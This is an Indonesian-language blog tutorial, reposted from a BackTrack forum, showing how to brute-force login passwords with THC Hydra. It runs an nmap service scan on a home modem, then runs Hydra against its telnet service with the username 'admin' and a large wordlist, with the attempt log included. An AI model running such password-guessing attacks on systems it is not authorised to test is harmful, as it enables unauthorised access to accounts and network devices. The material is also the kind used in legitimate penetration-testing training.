Minggu, 25 Maret 2012

Hydra

cara pakenya tinggal:
Code:
hydra -L "userlist" -P "wordlist" ip-target service PLAIN

artinya:
-L digunakan jika kita mempunyai list user yg kemungkinan dipake (ga pake -L jg bisa kok tapi harus di sebut usernya, tapi harus huruf L kecil, contoh --> -l admin)

-P adalah wordlist yang kita punya, klo di BT5 defaulnya ada di /pentest/passwords/wordlists/darkc0de.lst

ip-target diisi target kita, bisa webserver, router, switch, apapun itu asal ada ip dan service yg berjalan (dan termasuk dalam service yg ada di hydra tentunya)



service adalah sesuai yang ada di help hydra (lebih baiknya di nmap -sV dulu)

PLAIN jika target tidak menggunakan HTTPS (jika ada gunakan -S untuk melakukan koneksi SSL)

contohnya...

pertama kita lakukan port scanning dulu dengan nmap:

Code:
root@iKONs:~# nmap -sV 192.168.1.1

Quote:Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-24 01:11 WIT
Nmap scan report for 192.168.1.1
Host is up (0.00078s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Netgear broadband router or ZyXel VoIP adapter ftpd 1.0
23/tcp open telnet Netgear broadband router or ZyXel VoIP adapter telnetd
80/tcp open http Allegro RomPager 4.07 UPnP/1.0 (ZyXEL ZyWALL 2)
MAC Address: D8:5D:4C:A1:9D:E7 (Tp-link Technologies Co.)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.30 seconds

dari data diatas dapat kita lihat bahwa port 23 a.k.a service telnet aktif...

kemudian mari kita jalankan hydra dengan asumsi username adalah admin dan service yang mau dibrute force adalah telnet:

Code:
root@iKONs:~# hydra -V -l admin -P /pentest/passwords/wordlists/darkc0de.lst 192.168.1.1 telnet PLAIN

Quote:Hydra v7.0 ©2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-24 01:11:50
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 16 tasks, 1 server, 1707656 login tries (l:1/p:1707656), ~106728 tries per task
[DATA] attacking service telnet on port 23
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "" - child 0 - 1 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 1 - 2 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 2 - 3 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 3 - 4 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 4 - 5 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 5 - 6 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 6 - 7 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 7 - 8 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 8 - 9 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " " - child 9 - 10 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "!magnus" - child 10 - 11 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "!power" - child 11 - 12 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass ""A" SIDES" - child 12 - 13 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass ""DETROIT" GARY & CC TH WIGGINS" - child 13 - 14 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "#" - child 14 - 15 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "#" - child 15 - 16 of 1707656
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

proses diatas tidak ane lakukan sampe selese, karena pasti lama Tongue

btw target disini adalah modem ane, jd pls jangan diapa2in yak Tongue

semoga bermanfaat

Sumber: http://forum.indonesianbacktrack.or.id/showthread.php?tid=994&highlight=hydra

Tidak ada komentar:

Posting Komentar

Entri yang Diunggulkan

Makalah Manajemen Sumber Daya Manusia

Posting Populer